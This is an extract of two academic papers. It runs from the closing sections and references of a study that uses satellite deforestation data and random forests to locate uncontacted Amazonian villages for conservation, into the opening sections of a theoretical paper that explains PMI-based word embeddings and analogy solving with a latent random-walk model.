and Brazil and was probably inhabited during a similar time period. The other five possible locations identified by the random forest predictions with high resolution imagery available all appeared to be natural. Therefore, we estimate our testing precision with this small sample as 0.375 (3 true positives divided by 8 total cases). DISCUSSION We used deforestation data from Landsat satellites to train algorithms to identify the locations of uncontacted indigenous groups in Amazonia as part of an ongoing effort to better understand their conservation status and threats. Our results show that uncontacted villages have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night. Our random forest algorithm with an optimally-tuned cutoff has cross-validated performance metrics of over 98%. The case of the uncontacted Yanomami (also known as the Moxihatetea) is a good example of the importance of a near real-time monitoring system. Their previous village was abandoned in late 2014 and the Brazilian indigenous agency (FUNAI) and the Yanomami indigenous association (Hutukara) were particularly worried that some disaster had befallen them since much of the nearby area has seen invasions by gold miners. For a year and a half their whereabouts were unknown. We began looking for them using Landsat data, but it was the remote sensing fire alerts (FIRMS, Davies et al., 2009) that first alerted us to their exact location. We tasked a DigitalGlobe satellite image on May 12, 2016 and were relieved to find out that they were alive and well and clearing large gardens. The number of sections in their shabono village structure had increased from 16 to 17. We relayed this information on to FUNAI and Hutukara who then organized a flyover to officially confirm the location. Remote sensing provides many advantages over flyovers, and we actually do not recommend them. As we have shown, the information provided solely by remote sensing is sufficient to identify uncontacted villages. Remote sensing is safe, low-cost, and noninvasive, while flyovers are not. Population estimates are also crucial information for assessing trends in the demographic health of isolated populations by measuring areas of fields, villages, and houses in satellite imagery. Heads-up digitization of satellite imagery provides better population estimates than do flyovers where most people are not visible because many hide or run away in fear. Remote sensing offers the benefits of time-stamped evidence of occupation of areas inhabited by isolated populations, along with movements through time (Walker, Kesler & Hill, 2016). Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 7/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.170 CONCLUSIONS A dozen easily obtainable remote sensing measures allowed our random forest algorithm to successfully classify uncontacted versus contacted villages. Extending the algorithm to make predictions in a grid search greatly accelerates our ability to find and identify the locations of uncontacted villages. Moving forward we anticipate using an even lower cutoff value because the decreasing costs in satellite imagery make false positives from a more sensitive algorithm relatively cheap to evaluate and discard. We anticipate that this method will become the primary means by which to track and locate these same uncontacted villages, as well as undiscovered locations of uncontacted villages. One shortcoming of our classification model when applied to searching through unlabeled satellite imagery is that it was not designed to classify natural landslides, windfalls, or riverbank clearings. All of these natural processes also create deforestation signatures that further complicate our searches. Future work could well include these, but in the meantime we filter our predictions based on cleared area because natural clearings tend to be less than 0.5 ha while most uncontacted villages have larger areas than that. Our research is vital and timely as isolated groups are among the last remaining small- scale subsistence populations living in a traditional lifestyle. The enormous and mounting pressure from external threats create the possibility that isolated populations will disappear in the near future. Better monitoring and tracking with remote sensing are tools that might provide more informed conservation decisions concerning increased protection and land rights for the world’s most critically-endangered human cultures. ACKNOWLEDGEMENTS We thank Mark Flinn and the Comparative Methods course at the University of Missouri for their help and suggestions. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by a National Geographic Society Research and Exploration Grant (#9764-15). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Geographic Society Research and Exploration Grant: #9764-15. Competing Interests The authors declare there are no competing interests. Author Contributions • Robert S. Walker and Marcus J. Hamilton conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 8/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.170 tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The raw remote sensing variables are available in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.170#supplemental-information. REFERENCES Balk DL, Deichmann U, Yetman G, Pozzi F, Hay SI, Nelson A. 2006. Determining global population distribution: methods, applications and data. Advances in Parasitology 62:119–156 DOI 10.1016/S0065-308X(05)62004-0. Belgiu M, Drăguţ L. 2016. Random forest in remote sensing: a review of applications and future directions. ISPRS Journal of Photogrammetry and Remote Sensing 114:24–31 DOI 10.1016/j.isprsjprs.2016.01.011. Bodard L. 1974. Green hell: massacre of the Brazilian Indians. New York: Dutton. Breiman L. 2001. Random forests. Machine Learning 45:5–32 DOI 10.1023/A:1010933404324. Castillo BH. 2004. Indigenous peoples in isolation in the Peruvian Amazon. Copenhagen: International Work Group for Indigenous Affairs. Center for International Earth Science Information Network (CIESIN). 2005. Gridded population of the world: population density grid. Palisades: Columbia University, Centro Internacional de Agricultura Tropical. Davies DK, Ilavajhala S, Wong MM, Justice CO. 2009. Fire information for resource management system: archiving and distributing MODIS active fire data. IEEE Trans- actions on Geoscience and Remote Sensing 47:72–79 DOI 10.1109/TGRS.2008.2002076. Du P, Samat A, Waske B, Liu S, Li Z. 2015. Random forest and rotation forest for fully polarized SAR image classification using polarimetric and spatial features. ISPRS Journal of Photogrammetry and Remote Sensing 105:38–53 DOI 10.1016/j.isprsjprs.2015.03.002. Elkan C. 2001. The foundations of cost-sensitive learning. Proceedings of the IEEE International Joint Conference on Artificial Intelligence 17:973–978. Fagan C, Shoobridge D. 2005. An investigation of illegal mahogany logging in Peru’s Alto National Park and its surroundings’. Durham: ParksWatch. Hamilton MJ, Walker RS, Kesler D. 2014. Crash and rebound of indigenous populations in lowland South America. Scientific Reports 4(4541) DOI 10.1038/srep04541. Hansen MC, Potapov PV, Moore R, Hancher M, Turubanova SA, Tyukavina A, Thau D, Stehman SV, Goetz SJ, Loveland TR, Kommareddy A. 2013. High- resolution global maps of 21st-century forest cover change. Science 342:850–853 DOI 10.1126/science.1244693. Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 9/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.170#supplemental-information http://dx.doi.org/10.7717/peerj-cs.170#supplemental-information http://dx.doi.org/10.7717/peerj-cs.170#supplemental-information http://dx.doi.org/10.1016/S0065-308X(05)62004-0 http://dx.doi.org/10.1016/j.isprsjprs.2016.01.011 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.1109/TGRS.2008.2002076 http://dx.doi.org/10.1016/j.isprsjprs.2015.03.002 http://dx.doi.org/10.1038/srep04541 http://dx.doi.org/10.1126/science.1244693 http://dx.doi.org/10.7717/peerj-cs.170 Hanski I. 1999. Metapopulation ecology. Oxford: Oxford University Press. Hemming J. 1978. Red gold: the conquest of the Brazilian Indians. Cambridge: Harvard University Press. Hurtado AM, Hill KR, Kaplan H, Lancaster J. 2001. The epidemiology of infectious diseases among South American Indians: a call for guidelines for ethical research. Current Anthropology 42:425–432 DOI 10.1086/320482. Kesler DC, Walker RS. 2015. Geographic distribution of isolated indigenous societies in Amazonia and the efficacy of indigenous territories. PLOS ONE 10:e0125113 DOI 10.1371/journal.pone.0125113. Khoshgoftaar TM, Golawala M, Van Hulse J. 2007. An empirical study of learning from imbalanced data using random forest. IEEE Artificial Intelligence Tools 2:310–317. Levins R. 1969. Some demographic and genetic consequences of environmental het- erogeneity for biological control. Bulletin of the Entomological Society of America 15:237–240. Murray NJ, Keith DA, Bland LM, Ferrari R, Lyons MB, Lucas R, Pettorelli N, Nicholson E. 2018a. The role of satellite remote sensing in structured ecosystem risk assess- ments. Science of the Total Environment 619:249–257 DOI 10.1016/j.scitotenv.2017.11.034. Murray NJ, Keith DA, Simpson D, Wilshire JH, Lucas RM. 2018b. REMAP: an online remote sensing application for land cover classification and monitoring. Methods in Ecology and Evolution 9:2019–2027 DOI 10.1111/2041-210X.13043. Pal M. 2005. Random forest classifier for remote sensing classification. International Journal of Remote Sensing 26:217–222 DOI 10.1080/01431160412331269698. Pettorelli N, Laurance WF, O’Brien TG, Wegmann M, Nagendra H, Turner W. 2014. Satellite remote sensing for applied ecologists: opportunities and challenges. Journal of Applied Ecology 51:839–848 DOI 10.1111/1365-2664.12261. Pritchard SB. 2017. The trouble with darkness: NASA’s Suomi satellite images of earth at night. Environmental History 22:312–330 DOI 10.1093/envhis/emw102. Rabus B, Eineder M, Roth A, Bamler R. 2003. The shuttle radar topography mission—a new class of digital elevation models acquired by spaceborne radar. ISPRS Journal of Photogrammetry and Remote Sensing 57:241–262 DOI 10.1016/S0924-2716(02)00124-7. Ricardo B, Ricardo F. 2011. Povos indígenas no Brasil. São Paulo: Instituto Socioambien- tal. Rodriguez-Galiano VF, Ghimire B, Rogan J, Chica-Olmo M, Rigol-Sanchez JP. 2012. An assessment of the effectiveness of a random forest classifier for land-cover classification. ISPRS Journal of Photogrammetry and Remote Sensing 67:93–104 DOI 10.1016/j.isprsjprs.2011.11.002. Salisbury DS, Fagan C. 2013. Coca and conservation: cultivation, eradication, and traf- ficking in the Amazon borderlands. GeoJ 78:41–60 DOI 10.1007/s10708-011-9430-x. Tyukavina A, Hansen MC, Potapov PV, Krylov AM, Goetz SJ. 2016. Pan-tropical hinter- land forests: mapping minimally disturbed forests. Global Ecology and Biogeography 25:151–163 DOI 10.1111/geb.12394. Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 10/11 https://peerj.com http://dx.doi.org/10.1086/320482 http://dx.doi.org/10.1371/journal.pone.0125113 http://dx.doi.org/10.1016/j.scitotenv.2017.11.034 http://dx.doi.org/10.1111/2041-210X.13043 http://dx.doi.org/10.1080/01431160412331269698 http://dx.doi.org/10.1111/1365-2664.12261 http://dx.doi.org/10.1093/envhis/emw102 http://dx.doi.org/10.1016/S0924-2716(02)00124-7 http://dx.doi.org/10.1016/j.isprsjprs.2011.11.002 http://dx.doi.org/10.1007/s10708-011-9430-x http://dx.doi.org/10.1111/geb.12394 http://dx.doi.org/10.7717/peerj-cs.170 Vaz A. 2011. Isolados no Brasil. Política de estado: da tutela para a política de direitos— uma questão resolvida? Brasília: Estação Gráfica. Walker RS, Hamilton MJ. 2014. Amazonian societies on the brink of extinction. American Journal of Human Biology 26:570–572 DOI 10.1002/ajhb.22552. Walker RS, Hamilton MJ, Groth AA. 2014. Remote sensing and conservation of isolated indigenous villages in Amazonia. Royal Society Open Science 1(3):140246 DOI 10.1098/rsos.140246. Walker RS, Hill KR. 2015. Protecting isolated tribes. Science 348:1061 DOI 10.1126/science.aac6540. Walker RS, Kesler DC, Hill KR. 2016. Are isolated indigenous populations headed toward extinction? PLOS ONE 11:e0150987 DOI 10.1371/journal.pone.0150987. Wallace S. 2011. The unconquered: in search of the Amazon’s last uncontacted tribes. New York: Random House LLC. Wessel P, Smith WHF. 1996. A global, self-consistent, hierarchical, high-resolution shoreline database. Journal of Geophysical Research 101:8741–8743 DOI 10.1029/96JB00104. Zadrozny B, Langford J, Abe N. 2003. Cost-sensitive learning by cost-proportionate example weighting. Proceedings of the IEEE International Conference on Data Mining 3:435–442. Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 11/11 https://peerj.com http://dx.doi.org/10.1002/ajhb.22552 http://dx.doi.org/10.1098/rsos.140246 http://dx.doi.org/10.1126/science.aac6540 http://dx.doi.org/10.1371/journal.pone.0150987 http://dx.doi.org/10.1029/96JB00104 http://dx.doi.org/10.7717/peerj-cs.170 work_hmfm2qy66veqtbcqmo7nvj6ttu ---- A Latent Variable Model Approach to PMI-based Word Embeddings Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, Andrej Risteski Computer Science Department, Princeton University 35 Olden St, Princeton, NJ 08540 {arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu Abstract Semantic word embeddings represent the meaning of a word via a vector, and are cre- ated by diverse methods. Many use non- linear operations on co-occurrence statistics, and have hand-tuned hyperparameters and reweighting methods. This paper proposes a new generative model, a dynamic version of the log-linear topic model of Mnih and Hinton (2007). The method- ological novelty is to use the prior to com- pute closed form expressions for word statis- tics. This provides a theoretical justifica- tion for nonlinear models like PMI, word2vec, and GloVe, as well as some hyperparame- ter choices. It also helps explain why low- dimensional semantic embeddings contain lin- ear algebraic structure that allows solution of word analogies, as shown by Mikolov et al. (2013a) and many subsequent papers. Experimental support is provided for the gen- erative model assumptions, the most impor- tant of which is that latent word vectors are fairly uniformly dispersed in space. 1 Introduction Vector representations of words (word embeddings) try to capture relationships between words as dis- tance or angle, and have many applications in com- putational linguistics and machine learning. They are constructed by various models whose unify- ing philosophy is that the meaning of a word is defined by “the company it keeps” (Firth, 1957), namely, co-occurrence statistics. The simplest meth- ods use word vectors that explicitly represent co- occurrence statistics. Reweighting heuristics are known to improve these methods, as is dimension reduction (Deerwester et al., 1990). Some reweight- ing methods are nonlinear, which include taking the square root of co-occurrence counts (Rohde et al., 2006), or the logarithm, or the related Pointwise Mu- tual Information (PMI) (Church and Hanks, 1990). These are collectively referred to as Vector Space Models, surveyed in (Turney and Pantel, 2010). Neural network language models (Rumelhart et al., 1986; Rumelhart et al., 1988; Bengio et al., 2006; Collobert and Weston, 2008a) propose an- other way to construct embeddings: the word vec- tor is simply the neural network’s internal repre- sentation for the word. This method is nonlinear and nonconvex. It was popularized via word2vec, a family of energy-based models in (Mikolov et al., 2013b; Mikolov et al., 2013c), followed by a ma- trix factorization approach called GloVe (Penning- ton et al., 2014). The first paper also showed how to solve analogies using linear algebra on word em- beddings. Experiments and theory were used to sug- gest that these newer methods are related to the older PMI-based models, but with new hyperparameters and/or term reweighting methods (Levy and Gold- berg, 2014b). But note that even the old PMI method is a bit mysterious. The simplest version considers a sym- metric matrix with each row/column indexed by a word. The entry for (w,w′) is PMI(w,w′) = log p(w,w′) p(w)p(w′) , where p(w,w ′) is the empirical prob- ability of words w,w′ appearing within a window of certain size in the corpus, and p(w) is the marginal 385 Transactions of the Association for Computational Linguistics, vol. 4, pp. 385–399, 2016. Action Editor: Daichi Mochihashi. Submission batch: 10/2015; Revision batch: 2/2016; 3/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. probability of w. (More complicated models could use asymmetric matrices with columns correspond- ing to context words or phrases, and also involve ten- sorization.) Then word vectors are obtained by low- rank SVD on this matrix, or a related matrix with term reweightings. In particular, the PMI matrix is found to be closely approximated by a low rank ma- trix: there exist word vectors in say 300 dimensions, which is much smaller than the number of words in the dictionary, such that 〈vw,vw′〉≈ PMI(w,w′) (1.1) where ≈ should be interpreted loosely. There appears to be no theoretical explanation for this empirical finding about the approximate low rank of the PMI matrix. The current paper addresses this. Specifically, we propose a probabilistic model of text generation that augments the log-linear topic model of Mnih and Hinton (2007) with dynamics, in the form of a random walk over a latent discourse space. The chief methodological contribution is us- ing the model priors to analytically derive a closed- form expression that directly explains (1.1); see The- orem 2.2 in Section 2. Section 3 builds on this in- sight to give a rigorous justification for models such as word2vec and GloVe, including the hyperparam- eter choices for the latter. The insight also leads to a mathematical explanation for why these word em- beddings allow analogies to be solved using linear algebra; see Section 4. Section 5 shows good empir- ical fit to this model’s assumtions and predictions, including the surprising one that word vectors are pretty uniformly distributed (isotropic) in space. 1.1 Related work Latent variable probabilistic models of language have been used for word embeddings before, includ- ing Latent Dirichlet Allocation (LDA) and its more complicated variants (see the survey (Blei, 2012)), and some neurally inspired nonlinear models (Mnih and Hinton, 2007; Maas et al., 2011). In fact, LDA evolved out of efforts in the 1990s to provide a gen- erative model that “explains” the success of older vector space methods like Latent Semantic Index- ing (Papadimitriou et al., 1998; Hofmann, 1999). However, none of these earlier generative models has been linked to PMI models. Levy and Goldberg (2014b) tried to relate word2vec to PMI models. They showed that if there were no dimension constraint in word2vec, specifically, the “skip-gram with negative sampling (SGNS)” version of the model, then its solutions would satisfy (1.1), provided the right hand side were replaced by PMI(w,w′)−β for some scalar β. However, skip-gram is a discriminative model (due to the use of negative sampling), not generative. Fur- thermore, their argument only applies to very high- dimensional word embeddings, and thus does not address low-dimensional embeddings, which have superior quality in applications. Hashimoto et al. (2016) focuses on issues simi- lar to our paper. They model text generation as a random walk on words, which are assumed to be embedded as vectors in a geometric space. Given that the last word produced was w, the probability that the next word is w′ is assumed to be given by h(|vw − vw′|2) for a suitable function h, and this model leads to an explanation of (1.1). By contrast our random walk involves a latent discourse vector, which has a clearer semantic interpretation and has proven useful in subsequent work, e.g. understand- ing structure of word embeddings for polysemous words Arora et al. (2016). Also our work clarifies some weighting and bias terms in the training objec- tives of previous methods (Section 3) and also the phenomenon discussed in the next paragraph. Researchers have tried to understand why vec- tors obtained from the highly nonlinear word2vec models exhibit linear structures (Levy and Goldberg, 2014a; Pennington et al., 2014). Specifically, for analogies like “man:woman::king:??,” queen hap- pens to be the word whose vector vqueen is the most similar to the vector vking − vman + vwoman. This suggests that simple semantic relationships, such as masculine vs feminine tested in the above example, correspond approximately to a single direction in space, a phenomenon we will henceforth refer to as RELATIONS=LINES. Section 4 surveys earlier attempts to explain this phenomenon and their shortcoming, namely, that they ignore the large approximation error in rela- tionships like (1.1). This error appears larger than the difference between the best solution and the sec- ond best (incorrect) solution in analogy solving, so that this error could in principle lead to a complete 386 failure in analogy solving. In our explanation, the low dimensionality of the word vectors plays a key role. This can also be seen as a theoretical expla- nation of the old observation that dimension reduc- tion improves the quality of word embeddings for various tasks. The intuitive explanation often given —that smaller models generalize better—turns out to be fallacious, since the training method for cre- ating embeddings makes no reference to analogy solving. Thus there is no a priori reason why low- dimensional model parameters (i.e., lower model ca- pacity) should lead to better performance in anal- ogy solving, just as there is no reason they are bet- ter at some other unrelated task like predicting the weather. 1.2 Benefits of generative approaches In addition to giving some form of “unification” of existing methods, our generative model also brings more intepretability to word embeddings beyond tra- ditional cosine similarity and even analogy solving. For example, it led to an understanding of how the different senses of a polysemous word (e.g., bank) reside in linear superposition within the word em- bedding (Arora et al., 2016). Such insight into em- beddings may prove useful in the numerous settings in NLP and neuroscience where they are used. Another new explanatory feature of our model is that low dimensionality of word embeddings plays a key theoretical role —unlike in previous papers where the model is agnostic about the di- mension of the embeddings, and the superiority of low-dimensional embeddings is an empirical finding (starting with Deerwester et al. (1990)). Specifically, our theoretical analysis makes the key assumption that the set of all word vectors (which are latent vari- ables of the generative model) are spatially isotropic, which means that they have no preferred direction in space. Having n vectors be isotropic in d dimen- sions requires d � n. This isotropy is needed in the calculations (i.e., multidimensional integral) that yield (1.1). It also holds empirically for our word vectors, as shown in Section 5. The isotropy of low-dimensional word vectors also plays a key role in our explanation of the RELATIONS=LINES phenomenon (Section 4). The isotropy has a “purification” effect that mitigates the effect of the (rather large) approximation error in the PMI models. 2 Generative model and its properties The model treats corpus generation as a dynamic process, where the t-th word is produced at step t. The process is driven by the random walk of a dis- course vector ct ∈ <d. Its coordinates represent what is being talked about.1 Each word has a (time- invariant) latent vector vw ∈<d that captures its cor- relations with the discourse vector. We model this bias with a log-linear word production model: Pr[w emitted at time t | ct] ∝ exp(〈ct,vw〉). (2.1) The discourse vector ct does a slow random walk (meaning that ct+1 is obtained from ct by adding a small random displacement vector), so that nearby words are generated under similar discourses. We are interested in the probabilities that word pairs co- occur near each other, so occasional big jumps in the random walk are allowed because they have negligi- ble effect on these probabilities. A similar log-linear model appears in Mnih and Hinton (2007) but without the random walk. The linear chain CRF of Collobert and Weston (2008b) is more general. The dynamic topic model of Blei and Lafferty (2006) utilizes topic dynamics, but with a linear word production model. Belanger and Kakade (2015) have proposed a dynamic model for text us- ing Kalman Filters, where the sequence of words is generated from Gaussian linear dynamical systems, rather than the log-linear model in our case. The novelty here over such past works is a the- oretical analysis in the method-of-moments tradi- tion (Hsu et al., 2012; Cohen et al., 2012). Assuming a prior on the random walk we analytically integrate out the hidden random variables and compute a sim- ple closed form expression that approximately con- nects the model parameters to the observable joint probabilities (see Theorem 2.2). This is reminis- cent of analysis of similar random walk models in finance (Black and Scholes, 1973). Model details. Let n denote the number of words and d denote the dimension of the discourse space, where 1 ≤ d ≤ n. Inspecting (2.1) suggests word 1This is a different interpretation of the term “discourse” compared to some other settings in computational linguistics. 387 vectors need to have varying lengths, to fit the empir- ical finding that word probabilities satisfy a power law. Furthermore, we will assume that in the bulk, the word vectors are distributed uniformly in space, earlier referred to as isotropy. This can be quantified as a prior in the Bayesian tradition. More precisely, the ensemble of word vectors consists of i.i.d draws generated by v = s · v̂, where v̂ is from the spher- ical Gaussian distribution, and s is a scalar random variable. We assume s is a random scalar with ex- pectation τ = Θ(1) and s is always upper bounded by κ, which is another constant. Here τ governs the expected magnitude of 〈v,ct〉, and it is particularly important to choose it to be Θ(1) so that the distribu- tion Pr[w|ct] ∝ exp(〈vw,ct〉) is interesting.2 More- over, the dynamic range of word probabilities will roughly equal exp(κ2), so one should think of κ as an absolute constant like 5. These details about s are important for realistic modeling but not too impor- tant in our analysis. (Furthermore, readers uncom- fortable with this simplistic Bayesian prior should look at Section 2.1 below.) Finally, we clarify the nature of the random walk. We assume that the stationary distribution of the ran- dom walk is uniform over the unit sphere, denoted by C. The transition kernel of the random walk can be in any form so long as at each step the movement of the discourse vector is at most �2/ √ d in `2 norm.3 This is still fast enough to let the walk mix quickly in the space. The following lemma (whose proof appears in the appendix) is central to the analysis. It says that un- der the Bayesian prior, the partition function Zc =∑ w exp(〈vw,c〉), which is the implied normaliza- tion in equation (2.1), is close to some constant Z for most of the discourses c. This can be seen as a plausible theoretical explanation of a phenomenon called self-normalization in log-linear models: ig- noring the partition function or treating it as a con- stant (which greatly simplifies training) is known to often give good results. This has also been studied 2A larger τ will make Pr[w|ct] too peaked and a smaller one will make it too uniform. 3More precisely, the proof extends to any symmetric prod- uct stationary distribution C with sub-Gaussian coordinate sat- isfying Ec [ ‖c‖2 ] = 1, and the steps are such that for all ct, Ep(ct+1|ct)[exp(κ √ d‖ct+1 − ct‖)] ≤ 1 + �2 for some small �2. in (Andreas and Klein, 2014). Lemma 2.1 (Concentration of partition functions). If the word vectors satisfy the Bayesian prior de- scribed in the model details, then Pr c∼C [(1 − �z)Z ≤ Zc ≤ (1 + �z)Z] ≥ 1 −δ, (2.2) for �z = Õ(1/ √ n), and δ = exp(−Ω(log2 n)). The concentration of the partition functions then leads to our main theorem (the proof is in the ap- pendix). The theorem gives simple closed form approximations for p(w), the probability of word w in the corpus, and p(w,w′), the probability that two words w,w′ occur next to each other. The theorem states the result for the window size q = 2, but the same analysis works for pairs that appear in a small window, say of size 10, as stated in Corollary 2.3. Recall that PMI(w,w′) = log[p(w,w′)/(p(w)p(w′))]. Theorem 2.2. Suppose the word vectors satisfy the inequality (2.2), and window size q = 2. Then, log p(w,w′) = ‖vw + vw′‖22 2d − 2 log Z ± �, (2.3) log p(w) = ‖vw‖22 2d − log Z ± �. (2.4) for � = O(�z) + Õ(1/d) + O(�2). Jointly these imply: PMI (w,w′) = 〈vw,vw′〉 d ±O(�). (2.5) Remarks 1. Since the word vectors have `2 norm of the order of √ d, for two typical word vectors vw,vw′ , ‖vw + vw′‖22 is of the order of Θ(d). There- fore the noise level � is very small compared to the leading term 1 2d ‖vw + vw′‖22. For PMI however, the noise level O(�) could be comparable to the leading term, and empirically we also find higher error here. Remarks 2. Variants of the expression for joint probability in (2.3) had been hypothesized based upon empirical evidence in Mikolov et al. (2013b) and also Globerson et al. (2007), and Maron et al. (2010) . Remarks 3. Theorem 2.2 directly leads to the ex- tension to a general window size q as follows: 388 Corollary 2.3. Let pq(w,w′) be the co-occurrence probability in windows of size q, and PMIq(w,w′) be the corresponding PMI value. Then log pq(w,w ′) = ‖vw + vw′‖22 2d − 2 log Z + γ ± �, PMIq (w,w ′) = 〈vw,vw′〉 d + γ ±O(�). where γ = log ( q(q−1) 2 ) . It is quite easy to see that Theorem 2.2 implies the Corollary 2.3, as when the window size is q the pair w,w′ could appear in any of ( q 2 ) positions within the window, and the joint probability of w,w′ is roughly the same for any positions because the discourse vector changes slowly. (Of course, the er- ror term gets worse as we consider larger window sizes, although for any constant size, the statement of the theorem is correct.) This is also consistent with the shift β for fitting PMI in (Levy and Gold- berg, 2014b), which showed that without dimension constraints, the solution to skip-gram with negative sampling satisfies PMI (w,w′) −β = 〈vw,vw′〉 for a constant β that is related to the negative sampling in the optimization. Our result justifies via a genera- tive model why this should be satisfied even for low dimensional word vectors. 2.1 Weakening the model assumptions For readers uncomfortable with Bayesian priors, we can replace our assumptions with concrete proper- ties of word vectors that are empirically verifiable (Section 5.1) for our final word vectors, and in fact also for word vectors computed using other recent methods. The word meanings are assumed to be represented by some “ground truth” vectors, which the experi- menter is trying to recover. These ground truth vec- tors are assumed to be spatially isotropic in the bulk, in the following two specific ways: (i) For almost all unit vectors c the sum ∑ w exp(〈vw,c〉) is close to a constant Z; (ii) Singular values of the matrix of word vectors satisfy properties similar to those of random matrices, as formalized in the paragraph be- fore Theorem 4.1. Our Bayesian prior on the word vectors happens to imply that these two conditions hold with high probability. But the conditions may hold even if the prior doesn’t hold. Furthermore, they are compatible with all sorts of local structure among word vectors such as existence of cluster- ings, which would be absent in truly random vectors drawn from our prior. 3 Training objective and relationship to other models To get a training objective out of Theorem 2.2, we reason as follows. Let Xw,w′ be the number of times words w and w′ co-occur within the same window in the corpus. The probability p(w,w′) of such a co-occurrence at any particular time is given by (2.3). Successive samples from a random walk are not independent. But if the random walk mixes fairly quickly (the mixing time is related to the log- arithm of the vocabulary size), then the distribution of Xw,w′ ’s is very close to a multinomial distribu- tion Mul(L̃,{p(w,w′)}), where L̃ = ∑ w,w′ Xw,w′ is the total number of word pairs. Assuming this approximation, we show below that the maximum likelihood values for the word vectors correspond to the following optimization, min {vw},C ∑ w,w′ Xw,w′ ( log(Xw,w′ ) −‖vw +vw′‖22 −C )2 As is usual, empirical performance is improved by weighting down very frequent word pairs, possibly because very frequent words such as “the” do not fit our model. This is done by replacing the weighting Xw,w′ by its truncation min{Xw,w′,Xmax} where Xmax is a constant such as 100. We call this objec- tive with the truncated weights SN (Squared Norm). We now give its derivation. Maximizing the like- lihood of {Xw,w′} is equivalent to maximizing ` = log   ∏ (w,w′) p(w,w′)Xw,w′   . Denote the logarithm of the ratio between the ex- pected count and the empirical count as ∆w,w′ = log ( L̃p(w,w′) Xw,w′ ) . (3.1) Then with some calculation, we obtain the following where c is independent of the empirical observations 389 Xw,w′ ’s. ` = c + ∑ (w,w′) Xw,w′ ∆w,w′ (3.2) On the other hand, using ex ≈ 1 +x+x2/2 when x is small,4 we have L̃ = ∑ (w,w′) L̃pw,w′ = ∑ (w,w′) Xw,w′e ∆w,w′ ≈ ∑ (w,w′) Xw,w′ ( 1 + ∆w,w′ + ∆2w,w′ 2 ) . Note that L̃ = ∑ (w,w′) Xw,w′ , so ∑ (w,w′) Xw,w′ ∆w,w′ ≈− 1 2 ∑ (w,w′) Xw,w′ ∆ 2 w,w′. Plugging this into (3.2) leads to 2(c− `) ≈ ∑ (w,w′) Xw,w′ ∆ 2 w,w′. (3.3) So maximizing the likelihood is approximately equivalent to minimizing the right hand side, which (by examining (3.1)) leads to our objective. Objective for training with PMI. A similar ob- jective PMI can be obtained from (2.5), by com- puting an approximate MLE, using the fact that the error between the empirical and true value of PMI(w,w′) is driven by the smaller term p(w,w′), and not the larger terms p(w),p(w′). min {vw},C ∑ w,w′ Xw,w′ ( PMI(w,w′) −〈vw,vw′〉 )2 This is of course very analogous to classical VSM methods, with a novel reweighting method. Fitting to either of the objectives involves solving a version of Weighted SVD which is NP-hard, but empirically seems solvable in our setting via Ada- Grad (Duchi et al., 2011). 4This Taylor series approximation has an error of the order of x3, but ignoring it can be theoretically justified as follows. For a large Xw,w′ , its value approaches its expectation and thus the corresponding ∆w,w′ is close to 0 and thus ignoring ∆ 3 w,w′ is well justified. The terms where ∆w,w′ is significant corre- spond to Xw,w′ ’s that are small. But empirically, Xw,w′ ’s obey a power law distribution (see, e.g. Pennington et al. (2014)) us- ing which it can be shown that these terms contribute a small fraction of the final objective (3.3). So we can safely ignore the errors. Full details appear in the ArXiv version of this pa- per (Arora et al., 2015). Connection to GloVe. Compare SN with the ob- jective used by GloVe (Pennington et al., 2014): ∑ w,w′ f(Xw,w′ )(log(Xw,w′ )−〈vw,vw′〉−sw−sw′−C)2 with f(Xw,w′ ) = min{X3/4w,w′, 100}. Their weight- ing methods and the need for bias terms sw,sw′,C were derived by trial and error; here they are all predicted and given meanings due to Theorem 2.2, specifically sw = ‖vw‖2. Connection to word2vec(CBOW). The CBOW model in word2vec posits that the probability of a word wk+1 as a function of the previous k words w1,w2, . . . ,wk: p ( wk+1 ∣∣{wi}ki=1 ) ∝ exp(〈vwk+1, 1 k k∑ i=1 vwi〉). This expression seems mysterious since it de- pends upon the average word vector for the previ- ous k words. We show it can be theoretically jus- tified. Assume a simplified version of our model, where a small window of k words is generated as follows: sample c ∼ C, where C is a uniformly ran- dom unit vector, then sample (w1,w2, . . . ,wk) ∼ exp(〈 ∑k i=1 vwi,c〉)/Zc. Furthermore, assume Zc = Z for any c. Lemma 3.1. In the simplified version of our model, the Maximum-a-Posteriori (MAP) estimate of c given (w1,w2, . . . ,wk) is ∑k i=1 vwi ‖ ∑k i=1 vwi‖2 . Proof. The c maximizing p (c|w1,w2, . . . ,wk) is the maximizer of p(c)p (w1,w2, . . . ,wk|c). Since p(c) = p(c′) for any c,c′, and we have p (w1,w2, . . . ,wk|c) = exp(〈 ∑ i vwi,c〉)/Z, the maximizer is clearly c = ∑k i=1 vwi ‖ ∑k i=1 vwi‖2 . Thus using the MAP estimate of ct gives essen- tially the same expression as CBOW apart from the rescaling, which is often omitted due to computa- tional efficiency in empirical works. 4 Explaining RELATIONS=LINES As mentioned, word analogies like “a:b::c:??” can be solved via a linear algebraic expression: argmin d ‖va −vb −vc + vd‖22 , (4.1) 390 where vectors have been normalized such that ‖vd‖2 = 1. This suggests that the semantic rela- tionships being tested in the analogy are character- ized by a straight line,5 referred to earlier as RELA- TIONS=LINES. Using our model we will show the following for low-dimensional embeddings: for each such relation R there is a direction µR in space such that for any word 